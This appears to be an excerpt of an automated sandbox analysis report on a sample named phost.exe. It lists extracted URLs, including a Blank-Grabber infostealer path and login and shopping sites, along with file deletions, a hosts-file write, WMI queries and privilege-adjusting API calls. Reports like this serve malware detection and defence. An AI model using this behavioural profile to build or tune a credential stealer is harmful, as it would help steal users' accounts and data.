00000001.00000003.1871682113.000001AE1D361000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857854012.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D604000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178106775.000001AE1D607000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
              Source: phost.exe, 00000001.00000002.2177248707.000001AE1D269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
              Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
              Source: phost.exe, 00000001.00000003.1837339893.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1832092199.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2171558185.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1851038862.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1856459466.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1704273079.000001AE1D718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
              Source: phost.exe, 00000001.00000003.1851038862.000001AE1D6F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DBB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
              Source: phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2176893974.000001AE1CFB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
              Source: phost.exe, 00000001.00000002.2180428095.000001AE1E964000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: phost.exe, 00000001.00000003.1866119745.000001AE1E6F6000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179807278.000001AE1E6EA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E8F0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E97C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
              Source: powershell.exe, 0000000C.00000002.1792042705.000002119FF16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.2029247692.000001C7259B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1977970654.000001C71739C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.2029247692.000001C725AF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: svchost.exe, 00000014.00000003.1751303220.000001E22D972000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
              Source: svchost.exe, 00000014.00000003.1751303220.000001E22D906000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
              Source: powershell.exe, 0000004A.00000002.1977970654.000001C7170AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 0000004A.00000002.1977970654.000001C7170AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: phost.exe, 00000001.00000003.1704273079.000001AE1D771000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179183258.000001AE1DBB8000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178858146.000001AE1D8A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
              Source: phost.exe, 00000001.00000002.2177140880.000001AE1D0A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
              Source: phost.exe, 00000001.00000002.2183769002.00007FFDFB5E4000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
              Source: phost.exe, 00000001.00000002.2176893974.000001AE1D044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
              Source: phost.exe, 00000001.00000003.1816470539.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1702313330.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864030272.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1704441144.000001AE1D329000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1885946451.000001AE1D336000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1848757509.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2169952863.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2177462355.000001AE1D338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
              Source: phost.exe, 00000000.00000003.1679692860.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: phost.exe, 00000001.00000003.2172658215.000001AE1D86C000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1861089530.000001AE1D86C000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1853423748.000001AE1D86C000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2166653178.000001AE1D86C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
              Source: phost.exe, 00000001.00000003.1842261128.000001AE1D7B9000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1815420180.000001AE1D359000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1849010645.000001AE1D7B9000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1848923148.000001AE1D368000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1845215076.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1836777377.000001AE1D851000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1837150497.000001AE1E0D2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857564523.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: phost.exe, 00000001.00000003.1836777377.000001AE1D851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/produ
              Source: phost.exe, 00000001.00000003.1837150497.000001AE1E0D2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2176893974.000001AE1CFB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
              Source: phost.exe, 00000001.00000003.1845215076.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857564523.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
              Source: phost.exe, 00000001.00000003.2171558185.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2167660271.000001AE1E6C3000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178106775.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2166653178.000001AE1D872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: phost.exe, 00000001.00000003.2167660271.000001AE1E69E000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2169808101.000001AE1E0D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: phost.exe, 00000001.00000003.2171558185.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2167660271.000001AE1E6C3000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178106775.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2166653178.000001AE1D872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: phost.exe, 00000001.00000003.2167660271.000001AE1E69E000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2169808101.000001AE1E0D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: phost.exe, 00000001.00000002.2177248707.000001AE1D269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
              Source: phost.exe, 00000001.00000002.2177248707.000001AE1D1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
              Source: phost.exe, 00000001.00000003.1842261128.000001AE1D6F6000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D6F6000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2171558185.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1830725428.000001AE1D6F0000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1815420180.000001AE1D359000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178106775.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1856459466.000001AE1D6F0000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2176893974.000001AE1CFB7000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1851038862.000001AE1D6F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
              Source: phost.exe, 00000001.00000002.2179089914.000001AE1DAA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: phost.exe, 00000001.00000002.2178966357.000001AE1D9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
              Source: phost.exe, 00000001.00000002.2180428095.000001AE1E90C000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
              Source: phost.exe, 00000001.00000003.2173409124.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E8D0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
              Source: phost.exe, 00000001.00000003.2173409124.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
              Source: phost.exe, 00000001.00000003.2173409124.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
              Source: phost.exe, 00000001.00000003.2173409124.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
              Source: phost.exe, 00000001.00000003.2173409124.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DBA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
              Source: phost.exe, 00000001.00000002.2180428095.000001AE1E8D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bbc.co.uk/
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
              Source: phost.exe, 00000001.00000003.2173409124.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E8D0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
              Source: phost.exe, 00000001.00000003.2169554554.000001AE1E117000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: phost.exe, 00000001.00000002.2180428095.000001AE1E90C000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1862017771.000001AE1E691000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DBF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
              Source: phost.exe, 00000001.00000003.2169554554.000001AE1E117000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: phost.exe, 00000001.00000002.2180428095.000001AE1E8D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
              Source: phost.exe, 00000001.00000002.2180428095.000001AE1E8D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
              Source: phost.exe, 00000001.00000003.2172658215.000001AE1D86C000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1861089530.000001AE1D86C000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E8D0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179183258.000001AE1DBB8000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1853423748.000001AE1D86C000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2166653178.000001AE1D86C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: phost.exe, 00000001.00000003.1854068522.000001AE1D730000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1849010645.000001AE1D730000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1837339893.000001AE1D730000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2177248707.000001AE1D269000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1836777377.000001AE1D851000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1837150497.000001AE1E0D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: phost.exe, 00000001.00000003.1845215076.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857564523.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: phost.exe, 00000001.00000003.1837150497.000001AE1E0D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: phost.exe, 00000001.00000003.1845215076.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857564523.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: phost.exe, 00000001.00000003.1836777377.000001AE1D851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: phost.exe, 00000001.00000003.1845215076.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857564523.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: phost.exe, 00000001.00000003.1845215076.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1836777377.000001AE1D851000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1837150497.000001AE1E0D2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857564523.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: phost.exe, 00000001.00000003.1837339893.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857854012.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1830725428.000001AE1D600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
              Source: phost.exe, 00000001.00000003.1853895159.000001AE1D368000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1836777377.000001AE1D85A000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2177509778.000001AE1D368000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1815420180.000001AE1D359000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864387686.000001AE1D361000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1848923148.000001AE1D368000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1837150497.000001AE1E0E2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864030272.000001AE1D35D000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1845215076.000001AE1E0E2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1871682113.000001AE1D361000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2176893974.000001AE1CFB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
              Source: phost.exe, 00000001.00000003.1845215076.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857564523.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: phost.exe, 00000001.00000003.1866119745.000001AE1E6F6000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179807278.000001AE1E6EA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E974000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
              Source: phost.exe, 00000001.00000003.2173409124.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E8D0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E90C000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
              Source: phost.exe, 00000000.00000003.1678869412.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2183688641.00007FFDFB1A9000.00000004.00000001.01000000.0000000A.sdmp, phost.exe, 00000001.00000002.2182303838.00007FFDFAB28000.00000004.00000001.01000000.00000011.sdmpString found in binary or memory: https://www.openssl.org/H
              Source: phost.exe, 00000001.00000003.1687852160.000001AE1CFFE000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2176648071.000001AE1CC60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
              Source: phost.exe, 00000001.00000002.2183769002.00007FFDFB6E2000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/
              Source: phost.exe, 00000001.00000002.2183769002.00007FFDFB5E4000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/)
              Source: phost.exe, 00000001.00000003.2173409124.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E8D0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
              Source: phost.exe, 00000001.00000002.2178106775.000001AE1D6E2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1704518164.000001AE1D6E2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857854012.000001AE1D6E2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1837339893.000001AE1D6E2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1830725428.000001AE1D6E2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D6E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
              Source: phost.exe, 00000001.00000003.2173409124.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179183258.000001AE1DBA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: phost.exe, 00000001.00000002.2180428095.000001AE1E90C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
              Source: phost.exe, 00000001.00000003.1837339893.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1853895159.000001AE1D368000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1815420180.000001AE1D359000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864387686.000001AE1D361000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1848923148.000001AE1D368000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2175758589.000001AE1D383000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2171558185.000001AE1D600000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864030272.000001AE1D35D000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2177552719.000001AE1D385000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1871682113.000001AE1D361000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857854012.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D604000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178106775.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1830725428.000001AE1D600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window created: window name: CLIPBRDWNDCLASS

              Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\phost.exe | File deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\WUTJSCBCFX.png
Source: C:\Users\user\Desktop\phost.exe | File deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\LTKMYBSEYZ.jpg
Source: C:\Users\user\Desktop\phost.exe | File deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\LTKMYBSEYZ.jpg
Source: C:\Users\user\Desktop\phost.exe | File deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\UOOJJOZIRH.mp3
Source: C:\Users\user\Desktop\phost.exe | File deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\KZWFNRXYKI.jpg
Source: C:\Users\user\Desktop\phost.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: conhost.exe | Process created: 42
Source: cmd.exe | Process created: 71

              System Summary

              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe | Code function: 105_2_00007FF6BBCD3A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe | Code function: 105_2_00007FF6BBCFB57C: GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC710000_2_00007FF62CC71000
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC969D40_2_00007FF62CC969D4
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC78BD00_2_00007FF62CC78BD0
